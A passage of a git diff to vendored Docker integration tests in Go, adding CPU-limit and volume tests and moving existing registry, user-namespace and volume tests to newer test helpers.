 		c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
 
@@ -281,3 +296,44 @@ func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	c.Assert(waitRun(id), checker.IsNil)
 }
+
+func (s *DockerSuite) TestUpdateWithNanoCPUs(c *check.C) {
+	testRequires(c, cpuCfsQuota, cpuCfsPeriod)
+
+	file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"
+	file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us"
+
+	out, _ := dockerCmd(c, "run", "-d", "--cpus", "0.5", "--name", "top", "busybox", "top")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000")
+
+	clt, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	inspect, err := clt.ContainerInspect(context.Background(), "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000))
+
+	out = inspectField(c, "top", "HostConfig.CpuQuota")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0"))
+	out = inspectField(c, "top", "HostConfig.CpuPeriod")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0"))
+
+	out, _, err = dockerCmdWithError("update", "--cpu-quota", "80000", "top")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set")
+
+	out, _ = dockerCmd(c, "update", "--cpus", "0.8", "top")
+	inspect, err = clt.ContainerInspect(context.Background(), "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(800000000))
+
+	out = inspectField(c, "top", "HostConfig.CpuQuota")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0"))
+	out = inspectField(c, "top", "HostConfig.CpuPeriod")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0"))
+
+	out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "80000\n100000")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
index acf74238b2..54cfdd179c 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go
@@ -12,7 +12,7 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/pkg/system"
 	"github.com/go-check/check"
@@ -24,7 +24,7 @@ import (
 func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) {
 	testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel)
 
-	c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil)
+	s.d.StartWithBusybox(c, "--userns-remap", "default")
 
 	tmpDir, err := ioutil.TempDir("", "userns")
 	c.Assert(err, checker.IsNil)
@@ -36,8 +36,8 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) {
 	defer os.RemoveAll(tmpDirNotExists)
 
 	// we need to find the uid and gid of the remapped root from the daemon's root dir info
-	uidgid := strings.Split(filepath.Base(s.d.root), ".")
-	c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root)))
+	uidgid := strings.Split(filepath.Base(s.d.Root), ".")
+	c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.Root)))
 	uid, err := strconv.Atoi(uidgid[0])
 	c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid"))
 	gid, err := strconv.Atoi(uidgid[1])
@@ -61,15 +61,15 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("Could not inspect running container: out: %q", pid))
 	// check the uid and gid maps for the PID to ensure root is remapped
 	// (cmd = cat /proc/<pid>/uid_map | grep -E '0\s+9999\s+1')
-	out, rc1, err := runCommandPipelineWithOutput(
+	out, err = RunCommandPipelineWithOutput(
 		exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"),
 		exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid)))
-	c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out))
+	c.Assert(err, check.IsNil)
 
-	out, rc2, err := runCommandPipelineWithOutput(
+	out, err = RunCommandPipelineWithOutput(
 		exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"),
 		exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid)))
-	c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out))
+	c.Assert(err, check.IsNil)
 
 	// check that the touched file is owned by remapped uid:gid
 	stat, err := system.Stat(filepath.Join(tmpDir, "testfile"))
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
index 889936a062..df0c01a517 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go
@@ -6,120 +6,53 @@ import (
 	"net/http"
 	"os"
 
+	"github.com/docker/docker/internal/test/registry"
 	"github.com/go-check/check"
 )
 
-func makefile(contents string) (string, func(), error) {
-	cleanup := func() {
-
-	}
-
-	f, err := ioutil.TempFile(".", "tmp")
+func makefile(path string, contents string) (string, error) {
+	f, err := ioutil.TempFile(path, "tmp")
 	if err != nil {
-		return "", cleanup, err
+		return "", err
 	}
 	err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm)
 	if err != nil {
-		return "", cleanup, err
-	}
-
-	cleanup = func() {
-		err := os.Remove(f.Name())
-		if err != nil {
-			fmt.Println("Error removing tmpfile")
-		}
+		return "", err
 	}
-	return f.Name(), cleanup, nil
-
+	return f.Name(), nil
 }
 
-// TestV2Only ensures that a daemon in v2-only mode does not
+// TestV2Only ensures that a daemon does not
 // attempt to contact any v1 registry endpoints.
 func (s *DockerRegistrySuite) TestV2Only(c *check.C) {
-	reg, err := newTestRegistry(c)
+	reg, err := registry.NewMock(c)
+	defer reg.Close()
 	c.Assert(err, check.IsNil)
 
-	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
+	reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(404)
 	})
 
-	reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) {
+	reg.RegisterHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) {
 		c.Fatal("V1 registry contacted")
 	})
 
-	repoName := fmt.Sprintf("%s/busybox", reg.hostport)
-
-	err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true")
-	c.Assert(err, check.IsNil)
+	repoName := fmt.Sprintf("%s/busybox", reg.URL())
 
-	dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport))
-	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
-	defer cleanup()
+	s.d.Start(c, "--insecure-registry", reg.URL())
 
-	s.d.Cmd("build", "--file", dockerfileName, ".")
-
-	s.d.Cmd("run", repoName)
-	s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport)
-	s.d.Cmd("tag", "busybox", repoName)
-	s.d.Cmd("push", repoName)
-	s.d.Cmd("pull", repoName)
-}
-
-// TestV1 starts a daemon in 'normal' mode
-// and ensure v1 endpoints are hit for the following operations:
-// login, push, pull, build & run
-func (s *DockerRegistrySuite) TestV1(c *check.C) {
-	reg, err := newTestRegistry(c)
+	tmp, err := ioutil.TempDir("", "integration-cli-")
 	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmp)
 
-	v2Pings := 0
-	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
-		v2Pings++
-		// V2 ping 404 causes fallback to v1
-		w.WriteHeader(404)
-	})
-
-	v1Pings := 0
-	reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) {
-		v1Pings++
-	})
-
-	v1Logins := 0
-	reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) {
-		v1Logins++
-	})
-
-	v1Repo := 0
-	reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) {
-		v1Repo++
-	})
-
-	reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) {
-		v1Repo++
-	})
-
-	err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false")
-	c.Assert(err, check.IsNil)
-
-	dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport))
+	dockerfileName, err := makefile(tmp, fmt.Sprintf("FROM %s/busybox", reg.URL()))
 	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
-	defer cleanup()
 
-	s.d.Cmd("build", "--file", dockerfileName, ".")
-	c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build"))
+	s.d.Cmd("build", "--file", dockerfileName, tmp)
 
-	repoName := fmt.Sprintf("%s/busybox", reg.hostport)
 	s.d.Cmd("run", repoName)
-	c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run"))
-
-	s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport)
-	c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt"))
-
+	s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL())
 	s.d.Cmd("tag", "busybox", repoName)
 	s.d.Cmd("push", repoName)
-
-	c.Assert(v1Repo, check.Equals, 2)
-
 	s.d.Cmd("pull", repoName)
-	c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull"))
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
deleted file mode 100644
index 7672beb732..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
+++ /dev/null
@@ -1,58 +0,0 @@
-package main
-
-import (
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-// ensure docker version works
-func (s *DockerSuite) TestVersionEnsureSucceeds(c *check.C) {
-	out, _ := dockerCmd(c, "version")
-	stringsToCheck := map[string]int{
-		"Client:":       1,
-		"Server:":       1,
-		" Version:":     2,
-		" API version:": 2,
-		" Go version:":  2,
-		" Git commit:":  2,
-		" OS/Arch:":     2,
-		" Built:":       2,
-	}
-
-	for k, v := range stringsToCheck {
-		c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out))
-	}
-}
-
-// ensure the Windows daemon return the correct platform string
-func (s *DockerSuite) TestVersionPlatform_w(c *check.C) {
-	testRequires(c, DaemonIsWindows)
-	testVersionPlatform(c, "windows/amd64")
-}
-
-// ensure the Linux daemon return the correct platform string
-func (s *DockerSuite) TestVersionPlatform_l(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	testVersionPlatform(c, "linux")
-}
-
-func testVersionPlatform(c *check.C, platform string) {
-	out, _ := dockerCmd(c, "version")
-	expected := "OS/Arch:      " + platform
-
-	split := strings.Split(out, "\n")
-	c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split)))
-
-	// Verify the second 'OS/Arch' matches the platform. Experimental has
-	// more lines of output than 'regular'
-	bFound := false
-	for i := 14; i < len(split); i++ {
-		if strings.Contains(split[i], expected) {
-			bFound = true
-			break
-		}
-	}
-	c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
index 61a9413758..340bdfe254 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go
@@ -1,6 +1,7 @@
 package main
 
 import (
+	"context"
 	"fmt"
 	"io/ioutil"
 	"os"
@@ -8,16 +9,21 @@ import (
 	"path/filepath"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestVolumeCLICreate(c *check.C) {
 	dockerCmd(c, "volume", "create")
 
-	_, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver"))
-	c.Assert(err, check.Not(check.IsNil))
+	_, _, err := dockerCmdWithError("volume", "create", "-d", "nosuchdriver")
+	c.Assert(err, check.NotNil)
 
 	// test using hidden --name option
 	out, _ := dockerCmd(c, "volume", "create", "--name=test")
@@ -31,7 +37,7 @@ func (s *DockerSuite) TestVolumeCLICreate(c *check.C) {
 
 func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) {
 	c.Assert(
-		exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(),
+		exec.Command(dockerBinary, "volume", "inspect", "doesnotexist").Run(),
 		check.Not(check.IsNil),
 		check.Commentf("volume inspect should error on non-existent volume"),
 	)
@@ -49,21 +55,18 @@ func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) {
 func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) {
 	dockerCmd(c, "volume", "create", "test1")
 	dockerCmd(c, "volume", "create", "test2")
-	dockerCmd(c, "volume", "create", "not-shown")
+	dockerCmd(c, "volume", "create", "test3")
 
-	result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesnotexist", "test3")
+	result.Assert(c, icmd.Expected{
 		ExitCode: 1,
-		Err:      "No such volume: doesntexist",
+		Err:      "No such volume: doesnotexist",
 	})
 
 	out := result.Stdout()
-	outArr := strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out))
-
 	c.Assert(out, checker.Contains, "test1")
 	c.Assert(out, checker.Contains, "test2")
-	c.Assert(out, checker.Not(checker.Contains), "not-shown")
+	c.Assert(out, checker.Contains, "test3")
 }
 
 func (s *DockerSuite) TestVolumeCLILs(c *check.C) {
@@ -75,11 +78,8 @@ func (s *DockerSuite) TestVolumeCLILs(c *check.C) {
 	dockerCmd(c, "volume", "create", "soo")
 	dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/")
 
-	out, _ := dockerCmd(c, "volume", "ls")
-	outArr := strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
-
-	assertVolList(c, out, []string{"aaa", "soo", "test"})
+	out, _ := dockerCmd(c, "volume", "ls", "-q")
+	assertVolumesInList(c, out, []string{"aaa", "soo", "test"})
 }
 
 func (s *DockerSuite) TestVolumeLsFormat(c *check.C) {
@@ -88,12 +88,7 @@ func (s *DockerSuite) TestVolumeLsFormat(c *check.C) {
 	dockerCmd(c, "volume", "create", "soo")
 
 	out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-
-	expected := []string{"aaa", "soo", "test"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+	assertVolumesInList(c, out, []string{"aaa", "soo", "test"})
 }
 
 func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) {
@@ -112,12 +107,7 @@ func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) {
 	c.Assert(err, checker.IsNil)
 
 	out, _ := dockerCmd(c, "--config", d, "volume", "ls")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-
-	expected := []string{"aaa default", "soo default", "test default"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+	assertVolumesInList(c, out, []string{"aaa default", "soo default", "test default"})
 }
 
 // assertVolList checks volume retrieved with ls command
@@ -136,6 +126,20 @@ func assertVolList(c *check.C, out string, expectVols []string) {
 	c.Assert(volList, checker.DeepEquals, expectVols)
 }
 
+func assertVolumesInList(c *check.C, out string, expected []string) {
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	for _, expect := range expected {
+		found := false
+		for _, v := range lines {
+			found = v == expect
+			if found {
+				break
+			}
+		}
+		c.Assert(found, checker.Equals, true, check.Commentf("Expected volume not found: %v, got: %v", expect, lines))
+	}
+}
+
 func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) {
 	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
 	dockerCmd(c, "volume", "create", "testnotinuse1")
@@ -182,21 +186,8 @@ func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) {
 
 	out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin")
 	c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output"))
-	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output"))
+	c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output"))
 	c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output"))
-
-	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver")
-	outArr := strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
-
-	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local")
-	outArr = strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
-
-	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc")
-	outArr = strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out))
-
 }
 
 func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) {
@@ -220,17 +211,13 @@ func (s *DockerSuite) TestVolumeCLIRm(c *check.C) {
 	dockerCmd(c, "volume", "rm", id)
 	dockerCmd(c, "volume", "rm", "test")
 
-	out, _ = dockerCmd(c, "volume", "ls")
-	outArr := strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
-
 	volumeID := "testing"
 	dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar")
-	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing"))
-	c.Assert(
-		err,
-		check.Not(check.IsNil),
-		check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out))
+
+	icmd.RunCommand(dockerBinary, "volume", "rm", "testing").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+	})
 
 	out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar")
 	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
@@ -244,12 +231,13 @@ func (s *DockerSuite) TestVolumeCLIRm(c *check.C) {
 
 	dockerCmd(c, "volume", "rm", volumeID)
 	c.Assert(
-		exec.Command("volume", "rm", "doesntexist").Run(),
+		exec.Command("volume", "rm", "doesnotexist").Run(),
 		check.Not(check.IsNil),
 		check.Commentf("volume rm should fail with non-existent volume"),
 	)
 }
 
+// FIXME(vdemeester) should be a unit test in cli/command/volume package
 func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) {
 	out, _ := dockerCmd(c, "volume")
 	// no args should produce the cmd usage output
@@ -257,15 +245,20 @@ func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) {
 	c.Assert(out, checker.Contains, usage)
 
 	// invalid arg should error and show the command usage on stderr
-	_, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg"))
-	c.Assert(err, check.NotNil, check.Commentf(stderr))
-	c.Assert(stderr, checker.Contains, usage)
+	icmd.RunCommand(dockerBinary, "volume", "somearg").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+		Err:      usage,
+	})
 
 	// invalid flag should error and show the flag error and cmd usage
-	_, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag"))
-	c.Assert(err, check.NotNil, check.Commentf(stderr))
-	c.Assert(stderr, checker.Contains, usage)
-	c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag")
+	result := icmd.RunCommand(dockerBinary, "volume", "--no-such-flag")
+	result.Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Error:    "exit status 125",
+		Err:      usage,
+	})
+	c.Assert(result.Stderr(), checker.Contains, "unknown flag: --no-such-flag")
 }
 
 func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) {
@@ -296,6 +289,7 @@ func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) {
 			c.Assert(info[4], checker.Equals, "tmpfs")
 			c.Assert(info[5], checker.Contains, "uid=1000")
 			c.Assert(info[5], checker.Contains, "size=1024k")
+			break
 		}
 	}
 	c.Assert(found, checker.Equals, true)
@@ -370,16 +364,43 @@ func (s *DockerSuite) TestVolumeCLILsFilterLabels(c *check.C) {
 	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
 }
 
+func (s *DockerSuite) TestVolumeCLILsFilterDrivers(c *check.C) {
+	// using default volume driver local to create volumes
+	testVol1 := "testvol-1"
+	out, _, err := dockerCmdWithError("volume", "create", testVol1)
+	c.Assert(err, check.IsNil)
+
+	testVol2 := "testvol-2"
+	out, _, err = dockerCmdWithError("volume", "create", testVol2)
+	c.Assert(err, check.IsNil)
+
+	// filter with driver=local
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local")
+	c.Assert(out, checker.Contains, "testvol-1\n", check.Commentf("expected volume 'testvol-1' in output"))
+	c.Assert(out, checker.Contains, "testvol-2\n", check.Commentf("expected volume 'testvol-2' in output"))
+
+	// filter with driver=invaliddriver
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invaliddriver")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
+
+	// filter with driver=loca
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loca")
+	outArr = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
+
+	// filter with driver=
+	out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=")
+	outArr = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out))
+}
+
 func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) {
 	out, _ := dockerCmd(c, "volume", "create")
 	id := strings.TrimSpace(out)
 
 	dockerCmd(c, "volume", "rm", "-f", id)
 	dockerCmd(c, "volume", "rm", "--force", "nonexist")
-
-	out, _ = dockerCmd(c, "volume", "ls")
-	outArr := strings.Split(strings.TrimSpace(out), "\n")
-	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
 }
 
 func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) {
@@ -394,15 +415,54 @@ func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 	// Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data`
 	path := strings.TrimSuffix(strings.TrimSpace(out), "/_data")
-	out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path))
-	c.Assert(err, check.IsNil)
+	icmd.RunCommand("rm", "-rf", path).Assert(c, icmd.Success)
 
-	dockerCmd(c, "volume", "rm", "-f", "test")
+	dockerCmd(c, "volume", "rm", "-f", name)
 	out, _ = dockerCmd(c, "volume", "ls")
 	c.Assert(out, checker.Not(checker.Contains), name)
-	dockerCmd(c, "volume", "create", "test")
+	dockerCmd(c, "volume", "create", name)
+	out, _ = dockerCmd(c, "volume", "ls")
+	c.Assert(out, checker.Contains, name)
+}
+
+// TestVolumeCLIRmForceInUse verifies that repeated `docker volume rm -f` calls does not remove a volume
+// if it is in use. Test case for https://github.com/docker/docker/issues/31446
+func (s *DockerSuite) TestVolumeCLIRmForceInUse(c *check.C) {
+	name := "testvolume"
+	out, _ := dockerCmd(c, "volume", "create", name)
+	id := strings.TrimSpace(out)
+	c.Assert(id, checker.Equals, name)
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	out, e := dockerCmd(c, "create", "-v", "testvolume:"+prefix+slash+"foo", "busybox")
+	cid := strings.TrimSpace(out)
+
+	_, _, err := dockerCmdWithError("volume", "rm", "-f", name)
+	c.Assert(err, check.NotNil)
+	c.Assert(err.Error(), checker.Contains, "volume is in use")
 	out, _ = dockerCmd(c, "volume", "ls")
 	c.Assert(out, checker.Contains, name)
+
+	// The original issue did not _remove_ the volume from the list
+	// the first time. But a second call to `volume rm` removed it.
+	// Calling `volume rm` a second time to confirm it's not removed
+	// when calling twice.
+	_, _, err = dockerCmdWithError("volume", "rm", "-f", name)
+	c.Assert(err, check.NotNil)
+	c.Assert(err.Error(), checker.Contains, "volume is in use")
+	out, _ = dockerCmd(c, "volume", "ls")
+	c.Assert(out, checker.Contains, name)
+
+	// Verify removing the volume after the container is removed works
+	_, e = dockerCmd(c, "rm", cid)
+	c.Assert(e, check.Equals, 0)
+
+	_, e = dockerCmd(c, "volume", "rm", "-f", name)
+	c.Assert(e, check.Equals, 0)
+
+	out, e = dockerCmd(c, "volume", "ls")
+	c.Assert(e, check.Equals, 0)
+	c.Assert(out, checker.Not(checker.Contains), name)
 }
 
 func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) {
@@ -425,3 +485,155 @@ func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2))
 	c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3))
 }
+
+// Test case (1) for 21845: duplicate targets for --volumes-from
+func (s *DockerSuite) TestDuplicateMountpointsForVolumesFrom(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	image := "vimage"
+	buildImageSuccessfully(c, image, build.WithDockerfile(`
+		FROM busybox
+		VOLUME ["/tmp/data"]`))
+
+	dockerCmd(c, "run", "--name=data1", image, "true")
+	dockerCmd(c, "run", "--name=data2", image, "true")
+
+	out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1")
+	data1 := strings.TrimSpace(out)
+	c.Assert(data1, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2")
+	data2 := strings.TrimSpace(out)
+	c.Assert(data2, checker.Not(checker.Equals), "")
+
+	// Both volume should exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Contains, data1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, data2)
+
+	out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out))
+
+	// Only the second volume will be referenced, this is backward compatible
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app")
+	c.Assert(strings.TrimSpace(out), checker.Equals, data2)
+
+	dockerCmd(c, "rm", "-f", "-v", "app")
+	dockerCmd(c, "rm", "-f", "-v", "data1")
+	dockerCmd(c, "rm", "-f", "-v", "data2")
+
+	// Both volume should not exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2)
+}
+
+// Test case (2) for 21845: duplicate targets for --volumes-from and -v (bind)
+func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndBind(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	image := "vimage"
+	buildImageSuccessfully(c, image, build.WithDockerfile(`
+                FROM busybox
+                VOLUME ["/tmp/data"]`))
+
